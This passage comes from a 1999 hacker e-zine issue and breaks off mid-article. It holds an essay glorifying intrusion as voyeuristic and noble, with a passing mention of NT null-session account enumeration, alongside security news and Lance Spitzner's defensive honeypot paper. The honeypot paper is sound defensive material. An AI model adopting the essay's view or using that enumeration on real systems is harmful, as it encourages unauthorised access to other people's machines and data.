Hackers... Those who would be gods Why do we hack? Is it to alter webpages and leave some type of cybergang inner-city graffiti? Is it to laugh in the face of over-paid, under-qualified sysadmins? Well for myself, and everyone I associate with, the answer to both of those would be no. So then, why do we do it? To seek knowledge? Perhaps... That is definitely an overused and somewhat groundless excuse. We seek knowledge and wisdom every waking moment. Every breath we inhale leases us another 3 seconds of learning. Yes breaching a network's security does without a doubt involve learning. Yet do we not, on occasion, breach systems using exactly the same method as we have used previously? So in that case, why do we do it? If you have broken one NT box by guessing the Administrators password, why would we do it again to a different NT machine? Have we not already learned how to use an IPC$ share to gain the name of the re-named Admin account? We already know how to glean hidden shares from the aforementioned null connection. What are we learning from repeating the task? Nothing. So why then? I suppose the first few times, is in the hope that you will run into a new challenge. And sometimes we do, but is it often enough to chalk it all up to the great quest for knowledge? I personally wonder if that is true. Maybe as much as we shudder to admit it, it all comes down to two reasons. One is simply because it is there, and because we can. The other is slightly more sinister... We are voyeurs. We want to know what interesting stuff is on the other side. Whether we are corporate voyeurs, or peeping toms rifling through some hapless 98 users hard-drive. Sir Edmond Hillary once said, when questioned as to why he wished to climb Everest, "Simply because it is there." Are we really that shallow? Do we do this all simply because we can? Is the great quest for knowledge nothing more than what we tell ourselves to appease our conscience? Yet on the other hand I feel that there must be more to it. Maybe we really do have a primal thirst for information that isn't readily available to us. Perhaps we have a hidden side, that no one ever sees. A side that nothing ever senses but our keyboards. A darker vampiric, hematophagous side that thirsts for the life giving hemoglobin of information. A part of us so powerful it has altered our very genetic state. Have we evolved past the majority of our peers? Have we become demi-gods of a brave new "virtual" world? If you could imagine for a second, that we were to carry the same abilities and powers into the real world. What would we see? You are having an annoying conversation with someone you dislike, in a heartbeat they vanish from sight. You could instantly alter every part of your appearance, as to be totally unrecognizable, or to appear to be someone else entirely. Any company or person you wished, with a wave of your hand, they would lose the ability to communicate with anyone else in the world. You could be a ghost, and ethereally pass through any locked door or alarm system. You could grab any piece of information you desired from that home or office, and pass back through it's locked doors, with out any trace. Would these abilities not elevate us above normal human status? Is coding not the act of creation on a God like scale? "I wrote a little telnet app yesterday." Would translate, "Well you know, it took me a couple of hours, but I built this nifty little machine that allows me to instantly teleport myself to anywhere in the world." If that is the translation for writing a telnet app, what would everyone think of the guys that wrote Half life? :) So then back to our lives in this virtual world. Are we Gods? No. To us there is only one true God. And that is the Internet herself. All of her protocols, and operating systems. All of her routers, switches, fiber, and servers. Every tiny part of her, that communicate so eloquently together, as to create a whole. A whole entire being, that we all reside within. This is our God. This is whom we choose to worship. So what are we then my Hacker brethren? We make up less than 1% of all who reside within. Are we priests? No, I would place that label on the sysadmins, and helpdesk jockeys who instruct the herd. Perhaps we are Demons? Do demons not belong to the darkside, to the anti-God? If the Internet is our God, who is our Devil? Is it possible to have a positive without a negative, a Yin without a Yang? We must have an anti-God, yet what? I am not sure I know the answer. Could it be all that seek to control her? All that seek to bend our God to their gluttonous financial and controlling gain? It sounds plausible, and don't we battle against these powers? Do we not war against the very idea of governments and corporations altering our brave new world? If we are warriors of our God, would that not make us Angels? Thousands of years from now, our descendants may read their bible and understand how we all fought gallantly against the forces of darkness to ensure they lived in a world free of tyranny and oppression. They would read how the few battled fearlessly against the many, how we couldn't fathom the far-reaching consequences of our actions. They would marvel at how many of us were captured and destroyed, with out even knowing why we had to fight. So maybe we really don't need to grasp at an ethereal "why". It may all be pre-ordained, maybe we are just meant to do what we do, and it will all be revealed further down the long treacherous road. Then again... It is possible we are all just vitamin E deficient, socially inept humans, with a burning desire to wreak havoc, and feel power and respect we aren't afforded in our daily lives. Perhaps it is none of these things, yet that isn't for me to decide. I personally like the idea of throwing down my gauntlet, and standing as an avenging angel beside my God. Ready to war against all that would seek to harm her. Hex_Edit 08/04/99 Note: No email was provided so no permission was sought to reprint this article from HNN normally we contact the authors. - Ed @HWA 28.0 European Crypto Mailing List ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by LouisC A new mailing list for the discussion of cryptography issues in the European Union has been started. You can subscribe by sending email to majordomo@fitug.de that contains the words "subscribe eucrypto" JYA.com http://jya.com/eucrypto.htm 29.0 "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dr. Mudge Weird Al's latest video "Its All About the Pentiums" from his latest album "Running With Scissors" should be available online today at 3:30 PM (EST). It will first be debuted on MTV's Total Request Live. "Your waxing Your Modem to Make it Go Faster", "Your about as useless as jpegs to Helen Keller", "You say your C=64 is really neato? What kind of chip you got in there a Dorito?" This album rocks. Running With Scisssors- via Amazon.com http://www.amazon.com/exec/obidos/ASIN/B00000JH89/thehackernewsnet Weird Al Yankovich http://www.weirdal.com Its All About the Pentiums http://www.thepentiums.com Note; if you haven't heard this song or don't like Weird Al for some reason you HAVE to listen to it, its totally hilarious ... - Ed @HWA 30.0 WHO DO YOU WANT TO BE TODAY? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Thejian, Thursday 5th August 1999 on 8:20 pm CET Novell has released Digitalme, a software product that is said to allow Internet users to control their own online identity and make it easier, and safer, to respond to online user surveys. Once information is asked by a Web site, Digitalme steps in and provides only the facts about you you want others to know, making you as anonymous as you want to be. Full story below. http://www2.idg.com.au/cwt1997.nsf/8525601d005a204e85255fdc007c1fce/ddddc180892f6fa24a2567c20021527b?OpenDocument SYDNEY - Novell has released software it says allows Internet users to control their own online identity. Digitalme is designed to make it easier, and safer, to respond to the user surveys often required to enter a Web site, Novell officials said. Everyone needs to be able to manage their identity on the Internet but in the past you've had to let others do it for you and you had no control over what they did with your information," said Novell's director of technology and education services, Glen Jobson. Digitalme takes the company's Novell Directory Services (NDS) to the Internet. Users of the Novell's NetWare networking operating system are already familiar with the concept of an enterprise-wide directory that securely stores information about almost anything. Increasingly, users of Windows NT are becoming aware of directory services through the anticipation being generated by Microsoft around Active Directory. And quite a number of NT users have also discovered NDS since it recently went cross-platform. The digitalme push is set to take NDS right onto the public agenda and into the hearts and minds of everyone who has ever had to log in to anything on the Internet. The concept is simple enough. You tell someone you trust, maybe your bank, perhaps your ISP, everything that anyone on the Net would ever be likely to ask. When a site asks you to provide that information, there's no need to start typing. The digitalme agent steps up to the screen and completes it for you. Furthermore, the data communicated between digitalme and the Web site is encrypted and subject to an audit trail. Digitalme won't fill in any more information than you've told it you're happy to provide. If the site wants more information, digitalme will tell you what else is requested and seek your approval before handing out your particulars. You can even instruct digitalme to render an anonymous version of yourself to the Web site. The digitalme information is stored in an online vault, so users are no longer stumped when they use a foreign PC, to visit a favourite site. The first vault is being set up by Novell itself at a new site, www.digitalme.com. We're putting everything on the site that you need, as an end user or a developer,; Jobson said. You can get the client there, you can store your details in our vault, and you can download the source code and APIs so that you can build your own digitalme clients. Why would someone build their own clients? the whole Internet isn't going to want Novell to be the keeper of their personal data. We expect banks, online shops, finance advisers and Internet service providers, will want to manage their own vaults and encourage you to keep your details with them. Why would you trust them? This software only allows them to store your details securely. It doesn't allow them to read what's inside. Only you, the owner, can see what's inside, and only you can authorise the information to be released to third parties,; Jobson said. (c) Copyright 1999 ComputerWorld. All rights reserved. @HWA 31.0 NAI GROUPSHIELD FOR EXCHANGE BUG ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 5th August 1999 on 4:20 am CET This is a known but unnannounced bug in Network Associates Inc's Groupshield for Exchange AV-software, causing mail messages to disappear without warning or trace. The problem is known to NAI and they're said to be investigating the problem. Full story below. http://www.infoworld.com/cgi-bin/displayStory.pl?99084.ennai.htm NAI Groupshield for Exchange bug causes message loss By Ed Foster InfoWorld Electric Posted at 2:31 PM PT, Aug 4, 1999 A known but unannounced bug in Network Associates Inc.'s (NAI's) Groupshield for Exchange anti-virus product can cause messages from Exchange connectors to disappear. Users who have suffered from the bug report losing thousands of mail messages without warning or trace. Messages being scanned for viruses by Groupshield as they come through mail connectors are inadvertently dropped before reaching the Exchange server, according to the users. After describing the problem to NAI support engineers, users were told it is a known problem, but the company's only recommendation was that they disable virus scanning of all external mail connectors including those for the Internet mail, MS Mail, and cc:Mail. "When we called NAI, they knew of the problem," reported one frustrated user. "Their recommendation is to exclude any connectors from scanning, such as Internet or MS Mail. There is no indication anywhere of any problems in release notes or their [Web] site, even now. Even worse, they knew that the bug lost data." NAI officials contacted by InfoWorld said they could not confirm the existence of the bug, but are investigating it. They also acknowledged that earlier versions of the product -- before Groupshield for Exchange 4.03, released last month -- had a "message-locking feature" which under certain circumstances could inadvertently lock virus-free messages and prevent them from reaching the server. Such messages, however, can be recovered by the Groupshield administrator, they said, adding that they were unaware of circumstances in which messages would be permanently erased. Users insisted, however, that messages are completely erased and that NAI support has confirmed that fact. "It's not message locking; it's message disappearing," said another user who has repeatedly reproduced the problem using Groupshield with an MS Mail connector for Exchange. "We'd turn off their virus protection and the messages would all flow through. Turn it back on and the messages all vanish. Try it on another machine, and the same thing happens." Network Associates Inc., in Santa Clara, Calif., is at www.nai.com. @HWA 32.0 How the blackhats work ~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ TO BUILD A HONEYPOT by Thejian, Thursday 5th August 1999 on 3:50 am CET Many people asked Lance Spitzner how he was able to track black-hats in the act of probing for and compromising a system. Now he wrote a paper discussing just that. It discusses how to built, implement and monitor a honeypot network designed specifically to learn how black-hats work. Read the paper. http://www.enteract.com/~lspitz/honeypot.html - (Check here for other papers written by Lance - Ed) Lance Spitzner Last Modified: 4 August, 1999 This article is a follow up to the "Know Your Enemy" series. Many people from the Internet community asked me how I was able to track black-hats in the act of probing for and compromising a system. This paper discusses just that. Here I describe how I built, implemented, and monitored a honeypot network designed specifically to learn how black-hats work. What is a Honeypot? For me, a honeypot is a system designed to teach how black-hats probe for and exploit a system. By learning their tools and methods, you can then better protect your network and systems. I do not use honeypots to capture the bad guy. I want to learn how they work without them knowing they are being watched. For me, a well designed honeypot means the black-hat never knew he was being tracked. There are a variety of different approaches on how you can do this. Mine is only one of many. Before I continue, I would like to post a disclaimer. No honeypot can catch/capture all the bad guys out there. There are too many ways to spoof/hide your actions. Instead of going into detail on how this is possible, I highly recommend you check out Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection or Bane software, . Also, throughout this paper I use the term black-hat. To me, a black-hat is anyone who is attempting un-authorized access to a system. This could be an 15 year old kid from Seattle, or a 45 year old company employee in accounting. Throughout this paper our black-hat is referred to as he, however we have no idea what the true gender of the black-hat is. Where to Begin? There are a variety of different approaches to building a honeypot. Mine was based on simplicity. Build a standard box that I wanted to learn how the black-hat community was compromising. In this case it was Linux, but you can just as easily use Solaris, NT, or any other operating system. Don't do anything special to this system, build it as you would any other. Then put the system on the Internet and wait. Sooner or later someone will find the system and attack it. The system is built to be attacked and compromised, someone will gain root on that system, that is the goal. However, while they are gaining root (or Admin), you are tracking their every move. This approach is different from other concepts. Network Associates has built a commercial product called CyberCop Sting, Designed to run on NT, this product can emulate variety of different systems at the same time, including Linux, Solaris, Cisco IOS, and NT. Fred Cohen has developed the deception toolkit, which are a variety of tools intended to make it appear to attackers as if a system has a large number of widely known vulnerabilities. One of my favorites is NFR's BackOfficer Friendly, which emulates a Back Orifice server. All of these have their advantages. However, my goal was to build a honeypot that mirrored my production systems, so I could better understand what vulnerabilities and threats existed for my production network. Also, the fewer modifications I make to the honeypot, the less chance the black-hat will find something "fishy" on the box. I do not want the black-hat to ever learn that he was on a honeypot. The Plan My plan was simple. Build a box I wanted to learn about, put it on the network, and then wait. However, there were several problems to this. First, how do I track the black-hats moves.? Second, how do I alert myself when the system is probed or compromised? Last, how do I stop the black-hat from compromising other systems? The solution to this was simple, put the honeypot on its own network behind a firewall. This solves a variety of problems. - First, most firewalls log all traffic going through it. This becomes the first layer of tracking the black-hat's moves. By reviewing the firewall logs, we can begin to determine how black-hats probe our honeypot and what they are looking for. - Second, most firewalls have some alerting capability. You can build simple alerts whenever someone probes your network. Since no one should be connecting to your honeypot, any packets sent to it are most likely black-hats probing the system. If there is any traffic coming FROM the honeypot out to the Internet, then the honeypot was most likely compromised. For an example on how set up alerting with Check Point FireWall-1, click here. - Third, the firewall can control what traffic comes in and what traffic goes out. In this case, the firewall lets everything from the Internet in, but only limited traffic out. This way the black-hats can find, probe, and exploit our honeypot, but they cannot compromise other systems. The goal is to have our honeypot behind a controlled system. Most firewalls will do, as long as it can both control and log traffic going through it. Tracking Their Moves Now, the real trick becomes how to track their moves without them knowing it. First, you do not want to depend on a single source of information. Something can go wrong, things can be erased, etc. I prefer to track in layers. That way, if something does go wrong, you have additional sources of information. Also, you can compare different sources to paint a better picture. Personally, I do not like to log information on the honeypot itself. There are two reasons for this. First, the fewer modification you make to the honeypot, the better. The more changes you make, the better the chance a black-hat will discover something is up. The second reason is you can easily lose the information. Don't forget, sooner or later the black-hat will have root on the honeypot. Several times I have had data altered, or in one case, the entire hard drive wiped clean. Our goal is to track the enemies moves, but log all the data on a system they cannot access. As we discussed above, our first layer of tracking is the firewall logs. Besides this, I track the black-hat's moves several other ways. A second layer I use is the system logs on the honeypot. System logs provide valuable data, as they tell us what the kernel and user processes are doing. However, the first thing a black-hat normally does is wipe the system logs and replace syslogd. So, the challenge becomes logging syslog activity to another server, but without the black-hat knowing it. I do this by first building a dedicated syslog server, normally on a different network separated by the firewall. Then I recompile syslogd on the honeypot to read a different configuration file, such as /var/tmp/.conf. This way the black-hat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want. We then setup our new configuration file to log both locally and to the remote log server (example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, this will throw off the black-hat from realizing the true destination of our remote logging. Now, you will capture all system logs up to and including when the system is compromised. This will help tell us how the system was probed and compromised. It is also very interesting comparing these true system logs to the logs a black-hat has "cleaned" on a compromised system. This is the only time where I make a modification on the honeypot. The only problem with using a remote syslog server is it can be detected with a sniffer. Normally, black-hats either kill or replace syslogd when they gain root. If so, they can no longer sniff the syslog packets, since there are no longer any packets sent. However, if the black-hat does not modify nor kill the syslogd dameon, then they could sniff the packets sent. For the truly devious, you could send your syslogd traffic using a different protocol, such as IPX, which are normally not sniffed. Your level of paranoia may vary. There are also several alternatives you can use to standard syslogd. CORE-SDI has ssyslog, which implements a cryptographic protocol called PEO-1 that allows the remote auditing of system logs. For you NT users, they also have a Windows version, called slogger. There is also syslog-ng, developed by BalaBit Software, which is similiar in use to ssyslog, but uses SHA1 instead. All versions are free and open source. My third layer of tracking (the firewall is the first, syslogd hack is the second) is to use a sniffer. I run a sniffer on the firewall that sniffs any traffic going to or from the honeypot. Since the honeypot is isolated by the firewall, you know all traffic has to go through the firewall. The advantage of a sniffer is it picks up all keystrokes and screen captures, to include STDIN, STDOUT, and STDERR. This way you see exactly what the black-hat is seeing. Also, all the information is stored on the firewall, safely protected from the black-hat (I hope :). A disadvantage is the black-hat can hide his moves with encryption, such as ssh. However, if you are not running any such services on your honeypot, the blackhat may not use them. Also, a sniffer can be spoofed by advanced users, as discussed by the paper linked above. I've had great success using sniffit, a commonly used black-hat tool used to sniff passwords. It does this by sniffing the first 300 bytes of every packet. By configuring sniffit to capture the full payload of every packet, you can capture all the keystrokes in most sessions (example). Another excellent sniffer you may want to consider is snort, which has additional IDS capabilities. Finally, I run tripwire on the honeypot (there is also a NT version). Tripwire tells us what binaries have been altered on a compromised system (such as a new account added to /etc/passwd or a trojaned binary). I do this by running tripwire from a floppy, then storing the tripwire database to a floppy. You do NOT want any tripwire information stored locally on the system. By storing it on removable media, you can guarantee the integrity of the data. As an added precaution, I recommend compiling tripwire as statically linked. This way you are not using libraries that may be compromised on the honeypot. For the truly paranoid, boot off a floopy (such as tomsrtbt), then run tripwire. This protects against trojaned kernel modules. Tripwire is an excellent way to determine if you system has been compromised. Also, it is an excellent forensic tool that helps identify what modifications the black-hat has made. You may find these layers as redundant. But remember, no single layer of information can capture all the traffic. Also, different sources give you different information. For example, most systems cannot detect stealth scans, however, many firewalls can. If your firewall logs your honeypot being scanned, but there is nothing in the system logs, then you were most likely scanned by a "stealth" scanner, such as nmap. Also, we are not perfect. Often while tweaking one service, you munge another. You could accidentally kill system logging or the sniffer. By having other layers of information, you still can put a picture together of what happened. If you develop any of your own methods of tracking, I highly recommend you implement them. The more layers you have, the better off you are. If you have any methods you would like to recommend, I would love to hear from. Additional methods can include hacking the system shell or kernel to log keystrokes, but to be dead honest, I haven't developed the skills yet to do that. The Sting Remember, our goal is to learn about the black-hat, without him ever knowing he was had. To gain a better understanding of this strategy, I highly recommend you watch one of my favorite movies, The Sting. We want to attract the black-hats, monitor them, let them gain root, and then eventually kick them off the system, all without them getting supicious. To attract black-hats, I like to name my honeypot enticing names, such as ns1.example.com (name server), mail.example.com (mail server), or intranet.example.com (internal web server). These are often primary targets for black-hats. Once we have enticed them, use the methods discussed above to track their actions. Once the black-hat gains root, the question becomes, now what? Normally, I continue to monitor the black-hat for several days, to learn what he is up to. However, you have to be careful, eventually the black-hat will catch on that he is on a honeypot. If he does, bad things can happen.. What I like to do is once I learn everything I can, I kick the black-hat off, normally by rebooting the box. I do this with the shutdown command, sending a message to all logged on users (the black-hat), stating the system is going down for routine maintenance. I then take the system off-line, remove the backdoors the black-hat made, and bring the system back online. Or, you can reinstall, building a new system. I recommend you fix the vulnerability that was used to gain access last time, so you can learn about new exploits/vulnerabilities. The other issue is limiting the black-hat, we do not want him launching attacks from our own system. I do this by using the firewall. Remember, all traffic to and from the honeypot must go through the firewall. I use a rulebase that allows anything from the Internet to reach our firewall, but only limited traffic outbound (basically, the exact opposite of what a firewall is designed to do). The trick is, allowing enough outbound traffic so a black-hat does not get supicious, but we still have to limit their capabilities. If you block everything outbound, the black-hat will know right away that something is up. If you allow everything outbound, the black-hat can blatantly scan the Internet from your system. You now become liable for his actions, so we have to find a balance. Normally the first thing a black-hat does following access is to download their tool set. If they can't reach the Internet, they are going to cover their tracks and leave your system. What has worked for me is to allow all traffic inbound, and allow FTP, ICMP, and DNS (UDP) outbound. Normally, this is enough for the black-hat without them getting supiscious right away, but denies them utilizing most of their tools outbound. Your mileage may vary. Thats it. All that is let left is to wait for the black-hat to strike (kind of like fishing). Ensure you have a good alerting mechanism, so you know as soon as possible when your system is being probed or has been compromised. You want to get as much information as soon as possible. You do not want the black-hat to catch on before you know he is there, bad karma may be coming your way. Good luck! Conclusion Honeypots are an extremely powerful tool that allows you to learn about the black-hat community. Correctly implemented, they give you an inside window on how the black-hat community works. There are a variety of different approaches to building and implementing a honeypot, mine is only one of many. My goal is to build a simple system that mirrors the production network. then sit back and wait. The key to tracking the enemy is layers. Do not depend on a single layer of information, as it can be altered or lost. By comparing different layers of information, you can also gain a better understanding of what the black-hat was doing. Happy hunting :) Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . @HWA 33.0 ADMINS ASLEEP ON WATCH? ~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 5th August 1999 on 3:40 am CET "An Incident Note released by the CERT Coordination Center at Carnegie Mellon University suggests that crackers are using scripts to automatically probe for different vulnerabilities in rapid succession." Hence the term "script kiddie". Seems this reporter is figuring out the fact that most servers get "hacked" by utilizing known holes. ZDNet. -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Security administrator: Heal thyself By David Raikow, Sm@rt Reseller August 4, 1999 6:25 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2308725,00.html When it comes to security, system administrators like to think of themselves as defenders of the home-front, locked in an ongoing battle of wits with a horde of marauding invaders. But a recent round of attacks on UNIX servers suggests that, in reality, many administrators are asleep on watch. In an Incident Note released July 22, the CERT Coordination Center at Carnegie Mellon University described a wave of "Similar Attacks Using Various RPC [Remote Procedure Call] Services." Evidence from targeted servers suggests that crackers are using scripts to automatically probe for different vulnerabilities in rapid succession. Any one of these security holes could permit the cracker root-level access to the server, completely compromising its security and threatening any associated machines. While these type of alerts usually address newly discovered vulnerabilities or cracking techniques, this report was disturbing precisely because there was nothing new about it. Each of the security holes attacked by the scripts is well known and documented. Each has been fixed by free patches available from vendors. But because many sysadmins are lax about updating their software, the attacks often succeed anyway. Indeed, the type of "shotgun" approach that this automated approach suggests is attractive only if crackers suspect that a substantial percentage of servers are vulnerable. Security often takes a back seat to other priorities, as sysadmins focus on meeting the increasing demands placed on network systems, according to a CERT technician. Short term, immediate user needs tend to trump potential threats from unknown sources. "Security is an ongoing thing, and people don't always recognize the threat," says CERT Technical Coordinator Quinn Peyton, "Often good administrators are hampered because they lack the appropriate resources." Cracks Are Costly The costs of a root-level security breach can be devastating, however. According to CERT, compromised machines must be disconnected from the network, their drives wiped, and their OS software reinstalled from clean media. Any data restored from backups must be carefully scrutinized to prevent reintroduction of backdoors or viruses. Any and all sensitive information -- including passwords -- also has been compromised and must be changed. Finally all associated machines must also be scoured for any signs of intrusion. CERT does point out one silver lining to this cloud. "Once people are compromised, they tend to be much more diligent," notes Peyton. "Nobody wants to go through that twice." @HWA 34.0 THEFT HURTS THE WELL ~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Wednesday 4th August 1999 on 1:30 am CET A computer containing customer credit card numbers has been stolen from GST Whole Earth Networks' San Francisco office. Among those vulnerable for credit card fraud are some longstanding members of online community The WELL, although no fraudulent use has been reported yet or is much expected since the data was encrypted. Wired. http://www.wired.com/news/news/technology/story/21076.html Computer Theft Hurts The WELL by Chris Gaither 12:30 p.m. 3.Aug.99.PDT A computer loaded with customer credit card numbers has been swiped from GST Whole Earth Networks' San Francisco office. Among those vulnerable to credit card fraud are some longstanding members of The WELL, one of the Internet's first online communities. The WELL has no ISP of its own, and many members were grandfathered in to Whole Earth's WeNet service through a series of takeovers. No fraudulent use of the cards has been reported. The information was encrypted, according to GST. "That's great," Gail Ann Williams, executive director of The WELL, said of the encryption. "That's the ultimate defense we all dream of." About 2,700 of The WELL's 7,000 customers use the WeNet ISP, according to Andrew Ross, vice president of marketing for Salon.com, The WELL's parent company. GST Telecommunications, WeNet's parent company, would not comment or answer questions about the theft Tuesday, saying they were too busy preparing an annual earnings announcement. However, on Monday the company issued a release saying that credit card companies were immediately notified of the theft. Jennifer Powell, a member of The WELL since 1993, said the bank canceled her husband's credit card as a precautionary measure. She is thankful that no fraud has been reported, but she said her husband must now update payment information with every service paid for with that credit card. "It's not severe, but it's a pain," she said. The WELL provided Internet service until 1996, when it split off its ISP division. Whole Networks then took over the division, and GST Telecommunications took over Whole Networks, bringing along some of The WELL's customers for the ride. @HWA 35.0 MICROSOFT SECURITY FLAWS ~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 3rd August 1999 on 7:50 pm CET New York Times did an article on every growing number of bugs regarding Microsoft Internet Explorer.The main problem comes when IE opens Word, Power Point or Excel documents and it assumes that the documents are safe, so it doesn't open any warning box. Microsoft have a solution to this problem in a little Java applet. Read the article here. http://www.nytimes.com/library/tech/99/08/biztech/articles/03soft.html Software Makers Scramble to Address Security Flaw By SARA ROBINSON SAN FRANCISCO -- Three giants of the computer industry -- Microsoft, Hewlett-Packard and Compaq Computer -- found themselves scrambling on Tuesday to address a rash of serious security vulnerabilities in software designed to interact with Microsoft's Internet Explorer Web browser. The flaws, first made public last week, are particularly insidious because they allow intruders to plant malicious programs on a computer merely by sending an e-mail message or by luring a victim to a malicious Web page that automatically plants a file on the visitor's hard drive. In either case, the victim would receive no warning of a potential security violation because the flaws enable intruders to bypass the security controls of Internet Explorer and pass undetected through traps set by antivirus software. Tom Noonan, president of Internet Security Systems in Atlanta, said on Tuesday that several of his client corporations had expressed concern that "now that this information is in the wild, their systems are exposed." "They worry that they are building their network on top of a vulnerable system," he said. Unlike the Melissa virus or the Explore.exe worm, programs that exploit these newly discovered security bugs do not require that the victim take any action; rather, such programs can be activated if a user merely reads a malicious piece of e-mail while online. As of this evening, there had been no reports of intruders having exploited the flaws, but Microsoft announced that the problems had prompted plans for a major change in the security design of its Windows operating system and the Internet Explorer browser that it recently integrated into Windows. Currently, if Internet Explorer encounters on-line documents created by one of the Microsoft Office suite of programs -- Word, Excel or Powerpoint -- it assumes that they are "safe" and loads them on the user's computer without warning. The problem is that these are very powerful documents capable of launching executable code, whether benign or malicious. Microsoft said future operating systems would not trust such documents. Andrew Dixon, the Microsoft Office product manager, said the company was developing an applet, or small Java program, that would issue a warning before opening Office documents. The immediate problem with Office is that Word or Excel documents can relay an arbitrary command to a computer through a flawed data-base component that shipped with all but the last boxes of Office 97. The Office team worked over the weekend to develop and test a solution to this, Dixon said. But by this evening they still did not feel confident enough to release a patch for the problem to the 50 million registered users of Office 97. When a patch is available, he said, it will be posted on the Web at http://officeupdate.microsoft.com/Articles/MDACtyp.htm. In addition to the Office flaws, security holes were found last week in software shipped with Hewlett-Packard's Pavilion models and Compaq's Presarios. Both models were designed to offer customers remote support via the Internet, using Microsoft's browser. Both computer makers configured the browser to allow powerful little programs to run without warning the user. Unfortunately, these applets have the ability to run any other programs. Hewlett-Packard planned to have a patch available soon, said a company spokesman, Ray Aldrich. He said the fix would be posted on the Web at http://www.hp.com/support/hppavilion.html. "We believe this problem is serious and should be immediately addressed," Aldrich said. "We do so much testing but sometimes we miss stuff." Hedy Baker, the public relations manager for Compaq's consumer product division, said the company planned to issue an advisory on Wednesday to Compaq support centers and expected to send out a software update to owners of the affected Presarios by the end of next week. @HWA 36.0 CHINESE CYBER WARRIORS ~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 3rd August 1999 on 7:39 pm CET After NATO strikes on Yugoslavia, when China's embassy was accidentally hit, cyber war between American and Chinese hackers started. Chinese military wants to train, as they say "professional cyber warriors" to be ready for on-line battle. More on the topic from managing editor of asia.internet.com here. From asia. internet.com Chinese Military Seeks to Train Cyber Warriors August 3, 1999 By Hans Lombardo Managing Editor, asia.internet.com International News Archives [Hong Kong, CHINA] The Chinese military hopes to develop the capability of engaging in warfare over the Internet by training hackers to take the battle online. The Liberation Army Daily (LAD), a mouthpiece of China's Peoples Liberation Army (PLA), recently called for the development of this capability. The paper said that, by recruiting civilian hackers and training "cyber warriors" at Army schools, China could be prepared for an Internet war. The call was made in response to several hacking incidents in the US and China after NATO's bombing of the China's Belgrade Embassy. The Army paper reported that a "battle" was fought on the Internet between US and Chinese hackers. In May, Chinese hackers infiltrated various US government sites including the Department of Energy (DOE), the Department of the Interior (DOI), the US Embassy in China, and the Naval Communications Command. Nearly a thousand US civilian sites were broken into in the two days following the bombing, sources said. According to the Chinese military paper, US hackers responded by "counterattacking" several civilian sites in China. More recently, the Chinese government has been accused of waging a cyber war against the outlawed Chinese sect, Falun Gong. Webmasters in Canada, the US, and the UK have reported that their sites, hosting or linking to the sect's sites, were sabotaged or brought down by hackers traced to Chinese domains. In addition to this, Beijing has moved its rhetorical campaign against the sect on to the Web. The China Internet Information Center and The China Daily have set up anti-Falun Gong sites. @HWA 37.0 MICROSOFT AND SECURITY (AGAIN) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 3rd August 1999 on 6:30 pm CET SecurityPortal has a nice analysis of Microsofts problem with security (below). Their conclusion: realize MS isn't going away, but they need to be held accountable for the security of their products before they are released as well as after they are in production. The open source initiative is mentioned here as a possible way to do that keep track of those problems. But then still, the Windows 9x product needs to die. CNET has an article on the new MS OS beta-versions, is MS learning their lesson? See for yourself below. CNET: Does Microsoft's next OS point to strategy shift? By Stephanie Miles Staff Writer, CNET News.com August 3, 1999, 6:15 a.m. PT URL: http://www.news.com/News/Item/0,4,40064,00.html Microsoft's next consumer operating system will meld together bits and pieces of both Windows 98 and Windows 2000, according to those who have seen an early version of the release, a hodgepodge that raises questions about the company's overall strategy for its consumer platform. Microsoft has changed its strategy for the future of consumer Windows several times in the last few years, reacting to various hardware advances, delays in the release of its corporate operating system, and personnel reorganizations within the company. Currently, the official stance is this: Microsoft will release Millennium, another version of Windows 98, next year and Neptune, a consumer version of NT, in 2001 at the earliest. However, the lines are not clear-cut because beta testers now report that Millennium contains elements of Windows NT, the consumerish Windows 98 and Windows 2000, a corporate desktop operating system coming at the end of this year. Microsoft recently released a preliminary version of the Millennium code to developers and hardware partners. Although observers say these kinds of twists and turns are typical on the road to a major software release, some critics wonder if all the changes might actually be fueled by competitive challenges, such as the Linux operating system and America Online's popular instant messaging software. If anything, Microsoft appears to be busy grafting. The Windows Explorer file manager appears to be comprised almost completely of Windows 2000 code and is identified in the operating system as being from Windows 2000, according to Chris Hilbert, Webmaster at BetaNews, a beta testing Web site, while some of the help files appear to be based on Windows 98, Second Edition. "I think Millennium is just something they threw together to ooh and ahh the audience with this developer release," Hilbert said, adding that he does believe that the core of the operating system is based on Windows 98, as Microsoft has said. "I believe the guts, or kernel of the operating system, is still Windows 98 based, although a good portion of [Windows] Explorer does show signs of being Windows 2000." Originally, last year's Windows 98 was targeted as the last release based on the DOS operating system. Future consumer operating systems were expected to be based on Windows 2000, a variant of Windows NT. That strategy was then scuttled in favor of continuing the life of Windows 98 through incremental updates. Windows 98 Second Edition, released earlier this summer, was one such update. Millennium will be another. Windows 2000 has since been a victim of numerous delays, but is expected in corporate systems by the end of the year. Microsoft product managers could not replicate any scenarios that would identify the software as anything other than Millennium, a company spokesperson said, but conceded that the development team may have lifted code for minor features like dialogue boxes from Windows 2000. "There's no reason to invent whole new code--but that doesn't affect the fact that they're based on completely separate 